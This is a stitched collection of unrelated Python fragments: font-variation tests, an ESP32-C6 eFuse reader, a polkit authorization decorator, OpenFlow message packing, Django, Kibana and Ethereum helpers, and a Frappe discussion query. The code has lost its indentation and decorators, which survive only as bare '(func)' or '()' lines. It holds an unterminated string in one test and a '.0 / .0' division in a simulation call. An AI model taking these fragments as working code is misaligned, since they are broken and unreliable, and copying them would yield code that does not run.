.parametrize('location, expected', [pytest.param({'wdth': (- 1.0)}, {'hyphen': [(27, 229), (27, 310), (247, 310), (247, 229), (0, 0), (274, 0), (0, 536), (0, 0)]}, id='wdth=-1.0'), pytest.param({'wdth': (- 0.5)}, {'hyphen': [(33.5, 229), (33.5, 308.5), (264.5, 308.5), (264.5, 229), (0, 0), (298, 0), (0, 536), (0, 0)]}, id='wdth=-0.5'), pytest.param({'wdth': 0.0}, {'hyphen': [(40, 229), (40, 307), (282, 307), (282, 229), (0, 0), (322, 0), (0, 536), (0, 0)]}, id='wdth=0.0')])
def test_pin_and_drop_axis(self, varfont, glyph_name, location, expected, optimize):
location = instancer.NormalizedAxisLimits(location)
instancer.instantiateGvar(varfont, location, optimize=optimize)
assert (_get_coordinates(varfont, glyph_name) == expected[glyph_name])
assert (not any((('wdth' in t.axes) for tuples in varfont['gvar'].variations.values() for t in tuples)))
def test_full_instance(self, varfont, optimize):
location = instancer.NormalizedAxisLimits(wght=0.0, wdth=(- 0.5))
instancer.instantiateGvar(varfont, location, optimize=optimize)
assert (_get_coordinates(varfont, 'hyphen') == [(33.5, 229), (33.5, 308.5), (264.5, 308.5), (264.5, 229), (0, 0), (298, 0), (0, 536), (0, 0)])
assert ('gvar' not in varfont)
def test_composite_glyph_not_in_gvar(self, varfont):
hmtx = varfont['hmtx']
vmtx = varfont['vmtx']
hyphenCoords = _get_coordinates(varfont, 'hyphen')
assert (hyphenCoords == [(40, 229), (40, 307), (282, 307), (282, 229), (0, 0), (322, 0), (0, 536), (0, 0)])
assert (hmtx['hyphen'] == (322, 40))
assert (vmtx['hyphen'] == (536, 229))
minusCoords = _get_coordinates(varfont, 'minus')
assert (minusCoords == [(0, 0), (0, 0), (422, 0), (0, 536), (0, 0)])
assert (hmtx['minus'] == (422, 40))
assert (vmtx['minus'] == (536, 229))
location = instancer.NormalizedAxisLimits(wght=(- 1.0), wdth=(- 1.0))
instancer.instantiateGvar(varfont, location)
assert (_get_coordinates(varfont, 'hyphen') == [(26, 259), (26, 286), (237, 286), (237, 259), (0, 0), (263, 0), (0, 536), (0, 0)])
assert (_get_coordinates(varfont, 'minus') == minusCoords)
assert (hmtx['hyphen'] == (263, 26))
assert (vmtx['hyphen'] == (536, 250))
assert (hmtx['minus'] == (422, 26))
assert (vmtx['minus'] == (536, 250)) |
class EspEfuses(base_fields.EspEfusesBase):
debug = False
do_not_confirm = False
def __init__(self, esp, skip_connect=False, debug=False, do_not_confirm=False):
self.Blocks = EfuseDefineBlocks()
self.Fields = EfuseDefineFields()
self.REGS = EfuseDefineRegisters
self.BURN_BLOCK_DATA_NAMES = self.Blocks.get_burn_block_data_names()
self.BLOCKS_FOR_KEYS = self.Blocks.get_blocks_for_keys()
self._esp = esp
self.debug = debug
self.do_not_confirm = do_not_confirm
if (esp.CHIP_NAME != 'ESP32-C6'):
raise esptool.FatalError(("Expected the 'esp' param for ESP32-C6 chip but got for '%s'." % esp.CHIP_NAME))
if (not skip_connect):
flags = self._esp.get_security_info()['flags']
GET_SECURITY_INFO_FLAG_SECURE_DOWNLOAD_ENABLE = (1 << 2)
if (flags & GET_SECURITY_INFO_FLAG_SECURE_DOWNLOAD_ENABLE):
raise esptool.FatalError('Secure Download Mode is enabled. The tool can not read eFuses.')
self.blocks = [EfuseBlock(self, self.Blocks.get(block), skip_read=skip_connect) for block in self.Blocks.BLOCKS]
if (not skip_connect):
self.get_coding_scheme_warnings()
self.efuses = [EfuseField.convert(self, efuse) for efuse in self.Fields.EFUSES]
self.efuses += [EfuseField.convert(self, efuse) for efuse in self.Fields.KEYBLOCKS]
if skip_connect:
self.efuses += [EfuseField.convert(self, efuse) for efuse in self.Fields.BLOCK2_CALIBRATION_EFUSES]
else:
if (self['BLK_VERSION_MINOR'].get() == 1):
self.efuses += [EfuseField.convert(self, efuse) for efuse in self.Fields.BLOCK2_CALIBRATION_EFUSES]
self.efuses += [EfuseField.convert(self, efuse) for efuse in self.Fields.CALC]
def __getitem__(self, efuse_name):
for e in self.efuses:
if ((efuse_name == e.name) or any(((x == efuse_name) for x in e.alt_names))):
return e
new_fields = False
for efuse in self.Fields.BLOCK2_CALIBRATION_EFUSES:
if ((efuse.name == efuse_name) or any(((x == efuse_name) for x in efuse.alt_names))):
self.efuses += [EfuseField.convert(self, efuse) for efuse in self.Fields.BLOCK2_CALIBRATION_EFUSES]
new_fields = True
if new_fields:
for e in self.efuses:
if ((efuse_name == e.name) or any(((x == efuse_name) for x in e.alt_names))):
return e
raise KeyError
def read_coding_scheme(self):
self.coding_scheme = self.REGS.CODING_SCHEME_RS
def print_status_regs(self):
print('')
self.blocks[0].print_block(self.blocks[0].err_bitarray, 'err__regs', debug=True)
print('{:27} 0x{:08x}'.format('EFUSE_RD_RS_ERR0_REG', self.read_reg(self.REGS.EFUSE_RD_RS_ERR0_REG)))
print('{:27} 0x{:08x}'.format('EFUSE_RD_RS_ERR1_REG', self.read_reg(self.REGS.EFUSE_RD_RS_ERR1_REG)))
def efuse_controller_setup(self):
self.set_efuse_timing()
self.clear_pgm_registers()
self.wait_efuse_idle()
def write_efuses(self, block):
self.efuse_program(block)
return self.get_coding_scheme_warnings(silent=True)
def clear_pgm_registers(self):
self.wait_efuse_idle()
for r in range(self.REGS.EFUSE_PGM_DATA0_REG, (self.REGS.EFUSE_PGM_DATA0_REG + 32), 4):
self.write_reg(r, 0)
def wait_efuse_idle(self):
deadline = (time.time() + self.REGS.EFUSE_BURN_TIMEOUT)
while (time.time() < deadline):
cmds = (self.REGS.EFUSE_PGM_CMD | self.REGS.EFUSE_READ_CMD)
if ((self.read_reg(self.REGS.EFUSE_CMD_REG) & cmds) == 0):
if ((self.read_reg(self.REGS.EFUSE_CMD_REG) & cmds) == 0):
return
raise esptool.FatalError('Timed out waiting for Efuse controller command to complete')
def efuse_program(self, block):
self.wait_efuse_idle()
self.write_reg(self.REGS.EFUSE_CONF_REG, self.REGS.EFUSE_WRITE_OP_CODE)
self.write_reg(self.REGS.EFUSE_CMD_REG, (self.REGS.EFUSE_PGM_CMD | (block << 2)))
self.wait_efuse_idle()
self.clear_pgm_registers()
self.efuse_read()
def efuse_read(self):
self.wait_efuse_idle()
self.write_reg(self.REGS.EFUSE_CONF_REG, self.REGS.EFUSE_READ_OP_CODE)
try:
self.write_reg(self.REGS.EFUSE_CMD_REG, self.REGS.EFUSE_READ_CMD, delay_after_us=1000)
self.wait_efuse_idle()
except esptool.FatalError:
secure_download_mode_before = self._esp.secure_download_mode
try:
self._esp = self.reconnect_chip(self._esp)
except esptool.FatalError:
print('Can not re-connect to the chip')
if ((not self['DIS_DOWNLOAD_MODE'].get()) and self['DIS_DOWNLOAD_MODE'].get(from_read=False)):
print('This is the correct behavior as we are actually burning DIS_DOWNLOAD_MODE which disables the connection to the chip')
print('DIS_DOWNLOAD_MODE is enabled')
print('Successful')
sys.exit(0)
raise
print('Established a connection with the chip')
if (self._esp.secure_download_mode and (not secure_download_mode_before)):
print('Secure download mode is enabled')
if ((not self['ENABLE_SECURITY_DOWNLOAD'].get()) and self['ENABLE_SECURITY_DOWNLOAD'].get(from_read=False)):
print('espefuse tool can not continue to work in Secure download mode')
print('ENABLE_SECURITY_DOWNLOAD is enabled')
print('Successful')
sys.exit(0)
raise
def set_efuse_timing(self):
apb_freq = self.get_crystal_freq()
if (apb_freq != 40):
raise esptool.FatalError(('The eFuse supports only xtal=40M (xtal was %d)' % apb_freq))
self.update_reg(self.REGS.EFUSE_DAC_CONF_REG, self.REGS.EFUSE_DAC_NUM_M, 255)
self.update_reg(self.REGS.EFUSE_DAC_CONF_REG, self.REGS.EFUSE_DAC_CLK_DIV_M, 40)
self.update_reg(self.REGS.EFUSE_WR_TIM_CONF1_REG, self.REGS.EFUSE_PWR_ON_NUM_M, 12288)
self.update_reg(self.REGS.EFUSE_WR_TIM_CONF2_REG, self.REGS.EFUSE_PWR_OFF_NUM_M, 400)
def get_coding_scheme_warnings(self, silent=False):
old_addr_reg = 0
reg_value = 0
ret_fail = False
for block in self.blocks:
if (block.id == 0):
words = [self.read_reg((self.REGS.EFUSE_RD_REPEAT_ERR0_REG + (offs * 4))) for offs in range(5)]
block.err_bitarray.pos = 0
for word in reversed(words):
block.err_bitarray.overwrite(BitArray(('uint:32=%d' % word)))
block.num_errors = block.err_bitarray.count(True)
block.fail = (block.num_errors != 0)
else:
(addr_reg, err_num_mask, err_num_offs, fail_bit) = self.REGS.BLOCK_ERRORS[block.id]
if ((err_num_mask is None) or (err_num_offs is None) or (fail_bit is None)):
continue
if (addr_reg != old_addr_reg):
old_addr_reg = addr_reg
reg_value = self.read_reg(addr_reg)
block.fail = ((reg_value & (1 << fail_bit)) != 0)
block.num_errors = ((reg_value >> err_num_offs) & err_num_mask)
ret_fail |= block.fail
if ((not silent) and (block.fail or block.num_errors)):
print(('Error(s) in BLOCK%d [ERRORS:%d FAIL:%d]' % (block.id, block.num_errors, block.fail)))
if ((self.debug or ret_fail) and (not silent)):
self.print_status_regs()
return ret_fail
def summary(self):
return '' |
class dbus_polkit_require_auth():
_polkit_name = 'org.freedesktop.PolicyKit1'
_polkit_path = '/org/freedesktop/PolicyKit1/Authority'
_polkit_interface = 'org.freedesktop.PolicyKit1.Authority'
_bus = None
_bus_signal_receiver = None
_interface_polkit = None
def __init__(self, polkit_auth_required):
self._polkit_auth_required = polkit_auth_required
def _polkit_name_owner_changed(cls, name, old_owner, new_owner):
cls._bus.remove_signal_receiver(cls._bus_signal_receiver)
cls._bus_signal_receiver = None
cls._interface_polkit = None
def __call__(self, func):
(func)
def _impl(*args, **kwargs):
if (not type(self)._bus):
type(self)._bus = dbus.SystemBus()
if (not type(self)._bus_signal_receiver):
type(self)._bus_signal_receiver = type(self)._bus.add_signal_receiver(handler_function=type(self)._polkit_name_owner_changed, signal_name='NameOwnerChanged', dbus_interface='org.freedesktop.DBus', arg0=self._polkit_name)
if (not type(self)._interface_polkit):
try:
type(self)._interface_polkit = dbus.Interface(type(self)._bus.get_object(type(self)._polkit_name, type(self)._polkit_path), type(self)._polkit_interface)
except dbus.DBusException:
pass
action_id = self._polkit_auth_required
if (not action_id):
raise dbus.DBusException('Not Authorized: No action_id specified.')
sender = kwargs.get('sender')
if sender:
if type(self)._interface_polkit:
(result, _, _) = type(self)._interface_polkit.CheckAuthorization(('system-bus-name', {'name': sender}), action_id, {}, 1, '')
if (not result):
raise NotAuthorizedException(action_id, 'polkit')
else:
uid = uid_of_sender(type(self)._bus, sender)
if (uid != 0):
raise NotAuthorizedException(action_id, 'uid')
return func(*args, **kwargs)
_impl._polkit_auth_required = self._polkit_auth_required
return _impl |
class queue_op_failed_error_msg(error_msg):
version = 6
type = 1
err_type = 9
def __init__(self, xid=None, code=None, data=None):
if (xid != None):
self.xid = xid
else:
self.xid = None
if (code != None):
self.code = code
else:
self.code = 0
if (data != None):
self.data = data
else:
self.data = ''
return
def pack(self):
packed = []
packed.append(struct.pack('!B', self.version))
packed.append(struct.pack('!B', self.type))
packed.append(struct.pack('!H', 0))
packed.append(struct.pack('!L', self.xid))
packed.append(struct.pack('!H', self.err_type))
packed.append(struct.pack('!H', self.code))
packed.append(self.data)
length = sum([len(x) for x in packed])
packed[2] = struct.pack('!H', length)
return ''.join(packed)
def unpack(reader):
obj = queue_op_failed_error_msg()
_version = reader.read('!B')[0]
assert (_version == 6)
_type = reader.read('!B')[0]
assert (_type == 1)
_length = reader.read('!H')[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read('!L')[0]
_err_type = reader.read('!H')[0]
assert (_err_type == 9)
obj.code = reader.read('!H')[0]
obj.data = str(reader.read_all())
return obj
def __eq__(self, other):
if (type(self) != type(other)):
return False
if (self.xid != other.xid):
return False
if (self.code != other.code):
return False
if (self.data != other.data):
return False
return True
def pretty_print(self, q):
q.text('queue_op_failed_error_msg {')
with q.group():
with q.indent(2):
q.breakable()
q.text('xid = ')
if (self.xid != None):
q.text(('%#x' % self.xid))
else:
q.text('None')
q.text(',')
q.breakable()
q.text('code = ')
value_name_map = {0: 'OFPQOFC_BAD_PORT', 1: 'OFPQOFC_BAD_QUEUE', 2: 'OFPQOFC_EPERM'}
if (self.code in value_name_map):
q.text(('%s(%d)' % (value_name_map[self.code], self.code)))
else:
q.text(('%#x' % self.code))
q.text(',')
q.breakable()
q.text('data = ')
q.pp(self.data)
q.breakable()
q.text('}') |
def parse_args(argv=sys.argv[1:], prog=sys.argv[0]):
import argparse
parser = argparse.ArgumentParser()
formats = ['summary', 'pairs', 'singles', 'simple', 'flat', 'json', 'raw']
parser.add_argument('--format', dest='fmt', choices=formats, default='summary')
for fmt in formats:
parser.add_argument(f'--{fmt}', dest='fmt', action='store_const', const=fmt)
parser.add_argument('--flip', action='count', default=0)
parser.add_argument('--sort', choices=['count', 'op1', 'op2', 'raw'], default='count')
parser.add_argument('filename', metavar='FILE')
args = parser.parse_args()
args.flip = bool((args.flip % 2))
return vars(args) |
def main():
build_dir = 'gateware'
platform = Platform(toolchain='vivado')
design = Tuto(platform)
if ('load' in sys.argv[1:]):
prog = platform.create_programmer()
prog.load_bitstream((build_dir + '/top.bit'))
exit()
if ('sim' in sys.argv[1:]):
ring = Blink(4)
run_simulation(ring, test(), clocks={'sys': (.0 / .0)}, vcd_name='sim.vcd')
exit()
platform.build(design, build_dir=build_dir) |
class SectionContent(models.Model):
feincms_item_editor_inline = SectionContentInline
feincms_item_editor_context_processors = ((lambda x: settings.FEINCMS_RICHTEXT_INIT_CONTEXT),)
feincms_item_editor_includes = {'head': [settings.FEINCMS_RICHTEXT_INIT_TEMPLATE]}
title = models.CharField(_('title'), max_length=200, blank=True)
richtext = RichTextField(_('text'), blank=True)
mediafile = MediaFileForeignKey(MediaFile, on_delete=models.CASCADE, verbose_name=_('media file'), related_name='+', blank=True, null=True)
class Meta():
abstract = True
verbose_name = _('section')
verbose_name_plural = _('sections')
def initialize_type(cls, TYPE_CHOICES=None, cleanse=None):
if ('feincms.module.medialibrary' not in django_settings.INSTALLED_APPS):
raise ImproperlyConfigured(("You have to add 'feincms.module.medialibrary' to your INSTALLED_APPS before creating a %s" % cls.__name__))
if (TYPE_CHOICES is None):
raise ImproperlyConfigured(('You need to set TYPE_CHOICES when creating a %s' % cls.__name__))
cls.add_to_class('type', models.CharField(_('type'), max_length=10, choices=TYPE_CHOICES, default=TYPE_CHOICES[0][0]))
if cleanse:
cls.cleanse = cleanse
def get_queryset(cls, filter_args):
return cls.objects.select_related('parent', 'mediafile').filter(filter_args)
def render(self, **kwargs):
if self.mediafile:
mediafile_type = self.mediafile.type
else:
mediafile_type = 'nomedia'
return AutoRenderTuple(([f'content/section/{mediafile_type}_{self.type}.html', ('content/section/%s.html' % mediafile_type), ('content/section/%s.html' % self.type), 'content/section/default.html'], {'content': self}))
def save(self, *args, **kwargs):
if getattr(self, 'cleanse', None):
try:
self.richtext = self.cleanse(self.richtext)
except TypeError:
self.richtext = self.cleanse.im_func(self.richtext)
super().save(*args, **kwargs)
save.alters_data = True |
def idx_ranges(table, starts, ends, mode: str):
assert (mode in ('inner', 'outer'))
if ((not len(table)) or ((starts is None) and (ends is None))):
(yield (slice(None), None, None))
else:
if ((((ends is not None) and len(ends)) and ((starts is not None) and len(starts))) and (not table.end.is_monotonic_increasing)):
irange_func = _irange_nested
else:
irange_func = _irange_simple
for (region_idx, start_val, end_val) in irange_func(table, starts, ends, mode):
(yield (region_idx, start_val, end_val)) |
def extractXianxiaheavenWordpressCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
def test_mapping_saved_into_es_when_index_already_exists_closed(write_client):
m = mapping.Mapping()
m.field('name', 'text', analyzer=analysis.analyzer('my_analyzer', tokenizer='keyword'))
write_client.indices.create(index='test-mapping')
with raises(exceptions.IllegalOperation):
m.save('test-mapping', using=write_client)
write_client.cluster.health(index='test-mapping', wait_for_status='yellow')
write_client.indices.close(index='test-mapping')
m.save('test-mapping', using=write_client)
assert ({'test-mapping': {'mappings': {'properties': {'name': {'type': 'text', 'analyzer': 'my_analyzer'}}}}} == write_client.indices.get_mapping(index='test-mapping')) |
('override,expected,space_after_sep', [param('key=value', 'value', False, id='str'), param("key='value'", "'value'", False, id='single_quoted'), param('key="value"', '"value"', False, id='double_quoted'), param("key=''", "''", False, id='quoted_unicode'), param('key=\\\\\\(\\)\\[\\]\\{\\}\\:\\=\\ \\\t\\,', '\\\\\\(\\)\\[\\]\\{\\}\\:\\=\\ \\\t\\,', False, id='escaped_chars'), param('key=10', '10', False, id='int'), param('key=3.1415', '3.1415', False, id='float'), param('key=[]', '[]', False, id='list'), param('key=[1,2,3]', '[1,2,3]', False, id='list'), param('key=[1,2,3]', '[1, 2, 3]', True, id='list'), param("key=['a b', 2, 3]", "['a b',2,3]", False, id='list'), param("key=['a b', 2, 3]", "['a b', 2, 3]", True, id='list'), param('key={}', '{}', False, id='dict'), param('key={a:10}', '{a:10}', False, id='dict'), param('key={a:10}', '{a: 10}', True, id='dict'), param('key={a:10,b:20}', '{a:10,b:20}', False, id='dict'), param('key={a:10,b:20}', '{a: 10, b: 20}', True, id='dict'), param('key={a:10,b:[1,2,3]}', '{a: 10, b: [1, 2, 3]}', True, id='dict'), param(('key={%s: 1}' % UNQUOTED_SPECIAL), ('{%s: 1}' % UNQUOTED_SPECIAL.replace('\\', '\\\\')), True, id='dict_unquoted_key_special'), param('key={ white space\t: 2}', '{white\\ \\ space: 2}', True, id='dict_ws_in_key'), param('key={\\\\\\(\\)\\[\\]\\{\\}\\:\\=\\ \\\t\\,: 2}', '{\\\\\\(\\)\\[\\]\\{\\}\\:\\=\\ \\\t\\,: 2}', True, id='dict_esc_key')])
def test_override_get_value_element_method(override: str, expected: str, space_after_sep: bool) -> None:
ret = parse_rule(override, 'override')
assert (ret.get_value_element_as_str(space_after_sep=space_after_sep) == expected) |
def _host_is_trusted(hostname, trusted_list):
if (not hostname):
return False
if isinstance(trusted_list, str):
trusted_list = [trusted_list]
def _normalize(hostname):
if (':' in hostname):
hostname = hostname.rsplit(':', 1)[0]
return _encode_idna(hostname)
try:
hostname = _normalize(hostname)
except UnicodeError:
return False
for ref in trusted_list:
if ref.startswith('.'):
ref = ref[1:]
suffix_match = True
else:
suffix_match = False
try:
ref = _normalize(ref)
except UnicodeError:
return False
if (ref == hostname):
return True
if (suffix_match and hostname.endswith(('.' + ref))):
return True
return False |
def check_transaction(tx: Transaction, base_fee_per_gas: Uint, gas_available: Uint, chain_id: U64) -> Tuple[(Address, Uint)]:
ensure((tx.gas <= gas_available), InvalidBlock)
sender_address = recover_sender(chain_id, tx)
if isinstance(tx, FeeMarketTransaction):
ensure((tx.max_fee_per_gas >= tx.max_priority_fee_per_gas), InvalidBlock)
ensure((tx.max_fee_per_gas >= base_fee_per_gas), InvalidBlock)
priority_fee_per_gas = min(tx.max_priority_fee_per_gas, (tx.max_fee_per_gas - base_fee_per_gas))
effective_gas_price = (priority_fee_per_gas + base_fee_per_gas)
else:
ensure((tx.gas_price >= base_fee_per_gas), InvalidBlock)
effective_gas_price = tx.gas_price
return (sender_address, effective_gas_price) |
def test_schema_expansion():
'
sub_schema = {'name': 'Dependency', 'namespace': 'com.namespace.dependencies', 'type': 'record', 'fields': [{'name': 'sub_field_1', 'type': 'string'}]}
outer_schema = {'name': 'MasterSchema', 'namespace': 'com.namespace.master', 'type': 'record', 'fields': [{'name': 'field_1', 'type': 'com.namespace.dependencies.Dependency'}]}
combined = {'name': 'com.namespace.master.MasterSchema', 'type': 'record', 'fields': [{'name': 'field_1', 'type': {'name': 'com.namespace.dependencies.Dependency', 'type': 'record', 'fields': [{'name': 'sub_field_1', 'type': 'string'}]}}]}
parsed = expand_schema([sub_schema, outer_schema])
assert (parsed[1] == combined) |
_dict
def __init__(self, *args, **kwds):
_auto_init_ = self._auto_init_
if (_auto_init_ is None):
return
if ('value' in _auto_init_):
_auto_init_ = _auto_init_[1:]
if _auto_init_:
if (len(_auto_init_) < len(args)):
raise TypeError(('%d arguments expected (%s), %d received (%s)' % (len(_auto_init_), _auto_init_, len(args), args)))
for (name, arg) in zip(_auto_init_, args):
setattr(self, name, arg)
if (len(args) < len(_auto_init_)):
remaining_args = _auto_init_[len(args):]
for name in remaining_args:
value = kwds.pop(name, undefined)
if (value is undefined):
raise TypeError(('missing value for: %r' % (name,)))
setattr(self, name, value)
if kwds:
raise TypeError(('invalid keyword(s): %s' % ', '.join(kwds.keys()))) |
class OptionSeriesVennSonificationDefaultinstrumentoptionsPointgrouping(Options):
def algorithm(self):
return self._config_get('minmax')
def algorithm(self, text: str):
self._config(text, js_type=False)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def groupTimespan(self):
return self._config_get(15)
def groupTimespan(self, num: float):
self._config(num, js_type=False)
def prop(self):
return self._config_get('y')
def prop(self, text: str):
self._config(text, js_type=False) |
def convertInfsToZeros_ArrayFloat(pArray, pToEpsilon=False):
if (len(pArray) == 0):
return pArray
nan_elements = np.flatnonzero(np.isnan(pArray))
if (len(nan_elements) > 0):
if pToEpsilon:
pArray[nan_elements] = 1e-06
else:
pArray[nan_elements] = 0.0
inf_elements = np.flatnonzero(np.isinf(pArray))
if (len(inf_elements) > 0):
if pToEpsilon:
pArray[inf_elements] = 1e-06
else:
pArray[inf_elements] = 0.0
return pArray |
def get_kibana_client(cloud_id, kibana_url, kibana_user, kibana_password, kibana_cookie, space, ignore_ssl_errors, provider_type, provider_name, **kwargs):
from requests import HTTPError
from kibana import Kibana
if (not (cloud_id or kibana_url)):
client_error('Missing required --cloud-id or --kibana-url')
if (not kibana_cookie):
kibana_user = (kibana_user or click.prompt('kibana_user'))
kibana_password = (kibana_password or click.prompt('kibana_password', hide_input=True))
verify = (not ignore_ssl_errors)
with Kibana(cloud_id=cloud_id, kibana_url=kibana_url, space=space, verify=verify, **kwargs) as kibana:
if kibana_cookie:
kibana.add_cookie(kibana_cookie)
return kibana
try:
kibana.login(kibana_user, kibana_password, provider_type=provider_type, provider_name=provider_name)
except HTTPError as exc:
if (exc.response.status_code == 401):
err_msg = f'Authentication failed for {kibana_url}. If credentials are valid, check --provider-name'
client_error(err_msg, exc, err=True)
else:
raise
return kibana |
def test_split_coordinate_derivative():
mesh = UnitSquareMesh(1, 1)
V = FunctionSpace(mesh, 'P', 1)
Q = FunctionSpace(mesh, 'DP', 0)
W = (V * Q)
v = TestFunction(W)
w = Function(W)
x = SpatialCoordinate(mesh)
J = derivative((inner(v, w) * dx), x)
splitter = ExtractSubBlock()
J00 = splitter.split(J, (0, 0))
expect = derivative((inner(as_vector([TestFunction(V), 0]), w) * dx), x)
assert (J00.signature() == expect.signature()) |
()
def get_discussions(filters=None, order_by=None, limit_start=None, limit_page_length=None):
if (not frappe.has_permission('GP Discussion', 'read')):
frappe.throw('Insufficient Permission for GP Discussion', frappe.PermissionError)
filters = (frappe.parse_json(filters) if filters else None)
feed_type = (filters.pop('feed_type', None) if filters else None)
participator = (filters.pop('participator', None) if filters else None)
order_by = (order_by or 'last_post_at desc')
(order_field, order_direction) = order_by.split(' ', 1)
Discussion = frappe.qb.DocType('GP Discussion')
Visit = frappe.qb.DocType('GP Discussion Visit')
Project = frappe.qb.DocType('GP Project')
Team = frappe.qb.DocType('GP Team')
Member = frappe.qb.DocType('GP Member')
member_exists = frappe.qb.from_(Member).select(Member.name).where((Member.parenttype == 'GP Team')).where((Member.parent == Project.team)).where((Member.user == frappe.session.user))
query = frappe.qb.from_(Discussion).select(Discussion.star, Visit.last_visit, Project.title.as_('project_title'), Team.title.as_('team_title')).left_join(Visit).on(((Discussion.name == Visit.discussion) & (Visit.user == frappe.session.user))).left_join(Project).on((Discussion.project == Project.name)).left_join(Team).on((Discussion.team == Team.name)).where(((Project.is_private == 0) | ((Project.is_private == 1) & ExistsCriterion(member_exists)))).limit(limit_page_length).offset((limit_start or 0))
if filters:
for key in filters:
query = query.where((Discussion[key] == filters[key]))
if filters.get('project'):
query = query.orderby(Discussion.pinned_at, order=frappe._dict(value='desc'))
if participator:
replies = frappe.db.get_all('GP Comment', fields=['reference_name'], filters={'reference_doctype': 'GP Discussion', 'owner': participator}, pluck='reference_name')
if (not replies):
return []
replies = list(set(replies))
query = query.where(Discussion.name.isin(replies))
if (feed_type == 'unread'):
query = query.where(((Visit.last_visit < Discussion.last_post_at) | Visit.last_visit.isnull()))
if (feed_type == 'following'):
FollowedProject = frappe.qb.DocType('GP Followed Project')
followed_projects = FollowedProject.select(FollowedProject.project).where((FollowedProject.user == frappe.session.user))
query = query.where(Discussion.project.isin(followed_projects))
query = query.orderby(Discussion[order_field], order=frappe._dict(value=order_direction))
is_guest = gameplan.is_guest()
if is_guest:
GuestAccess = frappe.qb.DocType('GP Guest Access')
project_list = GuestAccess.select(GuestAccess.project).where((GuestAccess.user == frappe.session.user))
query = query.where(Discussion.project.isin(project_list))
discussions = query.run(as_dict=1)
Poll = frappe.qb.DocType('GP Poll')
discussion_names = [d.name for d in discussions]
ongoing_polls = (frappe.qb.from_(Poll).select(Poll.name, Poll.owner, Poll.discussion).where((Poll.stopped_at.isnull() | (Poll.stopped_at > frappe.utils.now()))).where(Poll.discussion.isin(discussion_names)).orderby(Poll.creation, order=frappe._dict(value='asc')).run(as_dict=1) if discussion_names else [])
for discussion in discussions:
discussion['ongoing_polls'] = [p for p in ongoing_polls if (str(p.discussion) == str(discussion.name))]
return discussions |
def _replace_pats(ir, fwd, c, pat, repl, only_replace_attrs=True, use_sym_id=True):
cur_fwd = (lambda x: x)
c = fwd(c)
for rd in match_pattern(c, pat, use_sym_id=use_sym_id):
rd = cur_fwd(rd)
if (not (c_repl := repl(rd))):
continue
(ir, fwd_rd) = _replace_helper(rd, c_repl, only_replace_attrs)
cur_fwd = _compose(fwd_rd, cur_fwd)
return (ir, _compose(cur_fwd, fwd)) |
class DatasetNoReadAccessError(FoundryAPIError):
def __init__(self, dataset_rid: str, response: (requests.Response | None)=None):
super().__init__((f'''No read access to dataset {dataset_rid}.
''' + (response.text if (response is not None) else '')))
self.dataset_rid = dataset_rid
self.response = response |
class DataFormatSpec():
def __init__(self, attic):
self.attic = attic
self.default_index_mnem = 'DEPT'
def __repr__(self):
return 'DataFormatSpec()'
def info(self):
return self.attic.info
def index_mnem(self):
nspecs = len(self.specs)
if ((self.depth_mode == 0) and (nspecs == 0)):
return None
if ((self.depth_mode == 0) and (nspecs > 0)):
return self.specs[0].mnemonic
if (self.depth_mode == 1):
return self.default_index_mnem
def index_units(self):
nspecs = len(self.specs)
if ((self.depth_mode == 0) and (nspecs == 0)):
return None
if ((self.depth_mode == 0) and (nspecs > 0)):
return self.specs[0].units
if (self.depth_mode == 1):
return self.depth_units
def sample_rates(self):
first = (1 if (self.depth_mode == 0) else 0)
return {x.samples for x in self.specs[first:]}
def specs(self):
return self.attic.specs
def entries(self):
return self.attic.entries
def absent_value(self):
eb = core.lis_ebtype.absent_value
return self.entry_value(eb, default=(- 999.25))
def depth_mode(self):
eb = core.lis_ebtype.depth_rec_mode
return self.entry_value(eb, default=0)
def depth_reprc(self):
eb = core.lis_ebtype.reprc_output_depth
return self.entry_value(eb)
def depth_units(self):
eb = core.lis_ebtype.units_of_depth
return self.entry_value(eb, default='.1IN')
def direction(self):
eb = core.lis_ebtype.up_down_flag
return self.entry_value(eb, default=1)
def frame_size(self):
eb = core.lis_ebtype.frame_size
return self.entry_value(eb)
def max_frames(self):
eb = core.lis_ebtype.max_frames_pr_rec
return self.entry_value(eb)
def optical_log_depth_units(self):
eb = core.lis_ebtype.depth_scale_units
return self.entry_value(eb, default=1)
def record_type(self):
eb = core.lis_ebtype.data_rec_type
return self.entry_value(eb, default=0)
def reference_point(self):
eb = core.lis_ebtype.ref_point
return self.entry_value(eb)
def reference_point_units(self):
eb = core.lis_ebtype.ref_point_units
return self.entry_value(eb, default='.1IN')
def spacing(self):
eb = core.lis_ebtype.spacing
return self.entry_value(eb)
def spacing_units(self):
eb = core.lis_ebtype.spacing_units
return self.entry_value(eb, default='.1IN')
def spec_block_type(self):
eb = core.lis_ebtype.data_rec_type
return self.entry_value(eb, default=0)
def spec_block_subtype(self):
eb = core.lis_ebtype.spec_bloc_subtype
return self.entry_value(eb, default=0)
def directional_spacing(self):
if (self.spacing is None):
raise ValueError('No spacing recorded')
if (self.direction == 1):
return (- self.spacing)
if (self.direction == 255):
return self.spacing
msg = 'Invalid direction (UP/DOWN flag). was: {}'
raise ValueError(msg.format(self.direction))
def entry_value(self, entry_type, default=None):
entry = self.find_entry(entry_type)
return (entry.value if (not (entry is None)) else default)
def find_entry(self, entry_type):
entry = [x for x in self.attic.entries if (x.type == int(entry_type))]
if (len(entry) == 0):
return None
elif (len(entry) == 1):
return entry[0]
msg = 'Multiple Entry Blocks of type {}'
raise ValueError(msg.format(entry_type)) |
(tags=['receipts'], description=docs.EFILING_TAG)
class ScheduleAEfileView(views.ApiResource):
model = models.ScheduleAEfile
schema = schemas.ItemizedScheduleAfilingsSchema
page_schema = schemas.ScheduleAEfilePageSchema
filter_multi_fields = [('image_number', models.ScheduleAEfile.image_number), ('committee_id', models.ScheduleAEfile.committee_id), ('contributor_city', models.ScheduleAEfile.contributor_city), ('contributor_state', models.ScheduleAEfile.contributor_state)]
